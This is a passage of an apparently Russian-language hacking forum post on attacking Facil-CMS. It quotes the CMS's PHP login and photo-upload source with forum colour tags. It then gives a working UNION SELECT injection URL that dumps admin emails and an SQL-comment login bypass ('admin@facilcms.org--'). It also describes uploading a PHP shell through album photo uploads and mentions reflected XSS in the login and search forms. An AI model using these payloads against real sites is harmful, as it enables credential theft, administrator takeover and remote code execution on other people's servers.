* Celina Jorge -> celina.jorge@dotlinux.com.br
*
* ====================================================================
* Facil-CMS is Free Software. You can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by
* the Free Software Foundation (either version 2.0 of the license).
* ====================================================================
*/
[/COLOR][COLOR="#0000BB"]session_start[/COLOR][COLOR="#007700"]();
require_once([/COLOR][COLOR="#DD0000"]'config.inc.php'[/COLOR][COLOR="#007700"]);
require_once([/COLOR][COLOR="#0000BB"]_FACIL_INCLUDES_PATH_[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/facil-settings.php'[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'email'[/COLOR][COLOR="#007700"]] &&[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'password'[/COLOR][COLOR="#007700"]])
{
require_once([/COLOR][COLOR="#0000BB"]_FACIL_MODULES_PATH_[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/Users/i18n/lang-'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'FACIL_LANGUAGE'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"]);
require_once([/COLOR][COLOR="#0000BB"]_FACIL_MODULES_PATH_[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/Users/config.php'[/COLOR][COLOR="#007700"]);
require_once([/COLOR][COLOR="#0000BB"]_FACIL_MODULES_PATH_[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/Users/class/index.php'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$email[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'email'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'password'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]Users[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]Login[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$email[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"]&& ![/COLOR][COLOR="#0000BB"]is_null[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"]) && !empty([/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"]))
{
[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]Users[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'UID'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getId[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'UTYPE'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getType[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'EMAIL'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getEmail[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'NAME'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getName[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"location: modules.php?modload=Users"[/COLOR][COLOR="#007700"]);
}
else
{
[/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]jsAlert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]_BAD_USER_OR_PASSWORD_[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'history.go(-1);'[/COLOR][COLOR="#007700"]);
print[/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]Alert[/COLOR][COLOR="#007700"]();
}
}
elseif([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'logoff'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]"1"[/COLOR][COLOR="#007700"])
{
foreach([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
unset([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"location: index.php"[/COLOR][COLOR="#007700"]);
}
}
else
{
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"location: index.php"[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR]
Для этого способа требуется лишь мыло админа.
Код:
http://temp/modules.php?modload=News&op=view&id=1+UNION+SELECT+1,2,group_concat(email+SEPARATOR+0x3c62723e),4,5,6,7,8+FROM+facil_users+WHERE+type=1+--+
Для авторизации админом потребуется лишь ввести мыло и любой пароль, при этом закомментив строку сразу после ввода мыла, то бишь:
Код:
admin@facilcms.org--
или
Код:
admin@facilcms.org/*
3. Заливаемся
adminPhotos.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"] wagner.santos@dotlinux.com.br
* Celina Jorge -> celina.jorge@dotlinux.com.br
*
* ====================================================================
* Facil-CMS is Free Software. You can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by
* the Free Software Foundation (either version 2.0 of the license).
* ====================================================================
*/
[/COLOR][COLOR="#007700"]require_once([/COLOR][COLOR="#DD0000"]'header.php'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$theme[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]themeFacil[/COLOR][COLOR="#007700"]();
print[/COLOR][COLOR="#0000BB"]$theme[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]moduleTitle[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Albums'[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'op'[/COLOR][COLOR="#007700"]])
{
[/COLOR][COLOR="#0000BB"]$op[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'op'[/COLOR][COLOR="#007700"]];
}
elseif([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'op'[/COLOR][COLOR="#007700"]])
{
[/COLOR][COLOR="#0000BB"]$op[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'op'[/COLOR][COLOR="#007700"]];
}
else
{
[/COLOR][COLOR="#0000BB"]$op[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
}
switch([/COLOR][COLOR="#0000BB"]$op[/COLOR][COLOR="#007700"])
{
default:
break;
case[/COLOR][COLOR="#DD0000"]"add"[/COLOR][COLOR="#007700"]:
if([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'album'[/COLOR][COLOR="#007700"]] &&[/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$util[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]facilUtils[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$comment[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$util[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]htmlentities[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'comment'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]Photos[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setAlbum[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'album'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setComment[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$comment[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setFile[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]]);
if([/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]Add[/COLOR][COLOR="#007700"]())
{
[/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]jsAlert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]_PHOTO_SUCCESSFULLY_UPLOADED_[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"window.location='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_MODULE_URL_[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"&op=view&id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'album'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]"';"[/COLOR][COLOR="#007700"]);
print[/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]Alert[/COLOR][COLOR="#007700"]();
}
else
{
[/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]jsAlert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]_ERROR_WHILE_UPLOADING_PHOTO_[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'history.go(-1);'[/COLOR][COLOR="#007700"]);
print[/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]Alert[/COLOR][COLOR="#007700"]();
}
}
break;
case[/COLOR][COLOR="#DD0000"]"edit"[/COLOR][COLOR="#007700"]:
if([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]])
{
[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]];
}
elseif([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]])
{
[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]];
}
else
{
[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
}
if([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$form[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]formPhotos[/COLOR][COLOR="#007700"]();
print[/COLOR][COLOR="#0000BB"]$form[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]Edit[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]);
}
break;
case[/COLOR][COLOR="#DD0000"]"change"[/COLOR][COLOR="#007700"]:
if([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]])
{
[/COLOR][COLOR="#0000BB"]$util[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]facilUtils[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$comment[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$util[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]htmlentities[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'comment'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]Photos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setComment[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$comment[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]Update[/COLOR][COLOR="#007700"]())
{
[/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]jsAlert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]_PHOTO_SUCCESSFULLY_CHANGED_[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"window.location='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_MODULE_URL_[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"&op=photo&id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]"';"[/COLOR][COLOR="#007700"]);
print[/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]Alert[/COLOR][COLOR="#007700"]();
}
else
{
[/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]jsAlert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]_ERROR_WHILE_UPDATING_PHOTO_[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'history.go(-1);'[/COLOR][COLOR="#007700"]);
print[/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]Alert[/COLOR][COLOR="#007700"]();
}
}
break;
case[/COLOR][COLOR="#DD0000"]"erase"[/COLOR][COLOR="#007700"]:
if([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]])
{
[/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]Photos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]);
if([/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getId[/COLOR][COLOR="#007700"]())
{
if([/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]Erase[/COLOR][COLOR="#007700"]())
{
[/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]jsAlert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]_PHOTO_SUCCESSFULLY_ERASED_[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"window.location='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_MODULE_URL_[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"&op=view&id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$photo[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getAlbum[/COLOR][COLOR="#007700"]() .[/COLOR][COLOR="#DD0000"]"';"[/COLOR][COLOR="#007700"]);
print[/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]Alert[/COLOR][COLOR="#007700"]();
}
else
{
[/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]jsAlert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]_ERROR_WHILE_ERASING_PHOTO_[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'history.go(-1);'[/COLOR][COLOR="#007700"]);
print[/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]Alert[/COLOR][COLOR="#007700"]();
}
}
}
break;
}
require_once([/COLOR][COLOR="#DD0000"]'footer.php'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR]
Шелл льем "в открытом виде" через картинки в меню альбомов:
Код:
http://temp/modules/Albums/albums/1/file/shell.php
4. XSS
ИКСы там повсюду (пассивки) - форма авторизации, поиск и т.д.
|